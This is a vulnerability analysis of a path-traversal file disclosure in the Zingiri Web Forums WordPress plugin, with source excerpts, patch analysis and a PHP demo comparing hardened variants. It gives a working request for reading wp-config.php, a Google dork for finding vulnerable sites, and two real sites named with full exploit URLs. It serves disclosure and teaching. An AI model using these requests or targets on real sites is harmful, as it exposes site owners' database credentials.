References:
WordPress Zingiri Forums arbitrary file disclosure http://ceriksen.com/2013/01/12/wordpress-zingiri-forums-arbitrary-file-disclosure/
Secunia Advisory SA50833 http://secunia.com/advisories/50833/
Analysis of the vulnerability
The Zingiri Web Forums plugin for WordPress writes out a header for the forum in forum.php by adding an action to wp_head:
44 add_action('wp_head','zing_forum_header');
686 function zing_forum_header()
687 {
688   global $zing_forum_content;
689   global $zing_forum_menu;
690   $output=zing_forum_output("content");
691
692   zing_integrator_cut($output,'<div id="footer">','</div>'); //remove footer
693   zing_integrator_cut($output,'<span class="forgot_password">','</span>');
694
695   $zing_forum_content=$output;
696
697   echo '<script type="text/javascript" language="javascript">';
698   echo "var zing_forum_url='".ZING_FORUM_URL."ajax/';";
699   echo "var zing_forum_index='".get_option('home')."/index.php?';";
700   echo "function zing_forum_url_ajax(s) { return zing_forum_url+s; }";
701   echo '</script>';
702
703   echo '<link rel="stylesheet" type="text/css" href="' . ZING_FORUM_URL . 'zing.css" media="screen" />';
704 }
So on every page load of the WordPress blog, zing_forum_header runs unauthenticated. The first call it makes is into zing_forum_output, which is rather long. Two areas matter: the place where the zforum GET parameter is read (lines 464-468), and the css branch shown further below.
456 function zing_forum_output($process) {
457   global $post,$wpdb,$zing_forum_loaded,$zing_forum_to_include,$zing_forum_mode;
458
459   $postVar=array();
460   switch ($process)
461   {
462     case "content":
463       if (isset($post)) $cf=get_post_custom($post->ID);
464       if (isset($_GET['zforum']))
465       {
466         $zing_forum_to_include=$_GET['zforum'];
467         $zing_forum_mode="forum";
468       }
We control the value of $zing_forum_to_include through the zforum GET parameter. It is then compared in a long elseif chain. Here is the block executed when it is set to css:
541 } elseif ($zing_forum_to_include=='css') {
542   ob_end_clean();
543   if (isset($_GET['stylesheet'])) $key=$_GET['stylesheet'];
544   else $key=$_GET['url'];
545   if (isset($_SESSION['ccforum']['stylesheet'][$key])) {
546     $output=$_SESSION['ccforum']['stylesheet'][$key];
547   } else {
548     if (isset($_GET['stylesheet'])) {
549       $http=zing_forum_http("mybb",'css.php',"");
550       $news = new zHttpRequest($http,'zingiri-forum');
551       if (!$news->curlInstalled()) return "cURL not installed";
552       elseif (!$news->live()) return "A HTTP Error occured";
553       $output=$news->DownloadToString();
554       $output=str_replace('url(images/','url('.ZING_MYBB_URL.'/images/',$output);
555
556     } elseif ($_GET['url']) {
557       $url=$_GET['url'];
558       $output=file_get_contents(ZING_MYBB_DIR.'/cache/themes/'.$url);
559     }
560     $f[]='/^body.*{(.*?)/';
561     $r[]=' {$1';
562     $f[]='/.zingbody/';
563     $r[]='';
564     $f[]='/(.*?).{(.*?)/';
565     $r[]='.ccforum $1 {$2';
566     $f[]='/(.*?),(.*?).{(.*?)/';
567     $r[]='$1,.ccforum $2 {$3';
568     $f[]='/(.*?),(.*?),(.*?).{(.*?)/';
569     $r[]='$1,$2,.ccforum $3 {$4';
570     $output=preg_replace($f,$r,$output,-1,$count);
571     if ($output) $_SESSION['ccforum']['stylesheet'][$key]=$output;
572   }
573   header("Content-type: text/css");
574   echo $output;
575   die();
If we set nothing except the url GET parameter, its value is fed straight into the file_get_contents call on line 558, prefixed only by ZING_MYBB_DIR.'/cache/themes/'. Nothing normalises or validates the path, so a relative path such as ../../wp-config.php walks out of the themes directory, and the file contents are echoed back as text/css to an unauthenticated visitor. The preg_replace pass on lines 560-570 only rewrites lines containing a brace, so the define() lines of wp-config.php come through unchanged. We can abuse this to disclose the contents of wp-config.php like this:
http://URL/wordpress/?zforum=css&url=wp-config.php
Google dork: inurl:plugins/zingiri-forum
Sites found affected: http://themakeupmorgue.com/?zforum=css&url=wp-config.php http://www.4newdesign.com/?zforum=css&url=wp-config.php
The fix:
Comparing version 1.4.2 with 1.4.4, line 557 $url=$_GET['url']; was changed to line 555 $url=str_replace('..','',$_GET['url']);
This strips every occurrence of .. so the path can no longer climb to a parent directory. Because str_replace removes all non-overlapping occurrences in one pass, nested forms such as ....// collapse to // rather than reassembling a .. sequence, so the traversal itself is closed. What the patch does not do is restrict which file is served: any file that really is under cache/themes, whatever its extension, is still readable through this branch, and the value is still not checked against the resolved path. A stronger fix would reduce the parameter to a bare file name, require a .css extension and verify the resolved path stays inside the themes directory.
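As an added example (not code from the plugin or from the original advisory), the following PHP puts the three versions of the url lookup side by side: the 1.4.2 concatenation, the 1.4.4 str_replace mitigation, and a hardened variant that keeps only a file name, requires a .css extension and checks the realpath() result against the themes directory. The directory layout, file contents and function names are constructed for the demonstration and are not from any WordPress install.

```php
<?php
// Added example: not the plugin's code. Three ways of resolving the "url"
// parameter in the css branch of zing_forum_output(), run against a
// constructed directory layout under the system temp dir.

// 1.4.2 behaviour: raw concatenation, so "../../wp-config.php" walks out of
// cache/themes and reads the WordPress config.
function theme_css_vulnerable($themesDir, $url)
{
    return @file_get_contents($themesDir . '/' . $url);
}

// 1.4.4 behaviour: every ".." is removed before concatenation. This stops
// traversal, but any file that is actually under cache/themes is still served.
function theme_css_144($themesDir, $url)
{
    $url = str_replace('..', '', $url);
    return @file_get_contents($themesDir . '/' . $url);
}

// Hardened variant (my own, not from any plugin release): keep only a file
// name, require a .css extension, and verify the resolved path is inside
// the themes directory before reading.
function theme_css_hardened($themesDir, $url)
{
    $name = basename((string) $url);
    if (!preg_match('/^[A-Za-z0-9_-]+\.css$/', $name)) {
        return false;
    }
    $root = realpath($themesDir);
    $path = realpath($themesDir . '/' . $name);
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return file_get_contents($path);
}

// Constructed layout: <tmp>/wp-config.php and <tmp>/cache/themes/{global.css,notes.txt}
$base   = sys_get_temp_dir() . '/zingiri_demo_' . getmypid();
$themes = $base . '/cache/themes';
mkdir($themes, 0700, true);
file_put_contents($base . '/wp-config.php', "<?php\ndefine('DB_PASSWORD', 'secret');\n");
file_put_contents($themes . '/global.css', "body { color: #333; }\n");
file_put_contents($themes . '/notes.txt', "not a stylesheet\n");

$cases = array(
    'global.css',                 // legitimate request
    '../../wp-config.php',        // the disclosure payload from the advisory
    '....//....//wp-config.php',  // nested form: str_replace collapses it to "////wp-config.php"
    'notes.txt',                  // inside the directory but not a stylesheet
);

foreach ($cases as $url) {
    $v = theme_css_vulnerable($themes, $url);
    $m = theme_css_144($themes, $url);
    $h = theme_css_hardened($themes, $url);
    printf("%-28s 1.4.2:%-7s 1.4.4:%-7s hardened:%s\n", $url,
        $v === false ? 'denied' : 'read',
        $m === false ? 'denied' : 'read',
        $h === false ? 'denied' : 'read');
}

// Remove the constructed layout again.
unlink($themes . '/notes.txt');
unlink($themes . '/global.css');
unlink($base . '/wp-config.php');
rmdir($themes);
rmdir($base . '/cache');
rmdir($base);
```

Run it with `php demo.php`. The wp-config.php row shows the 1.4.2 code reading the file and both later variants refusing it; the notes.txt row shows the difference between the shipped patch and the hardened version, since str_replace on its own still serves any file that lives under cache/themes.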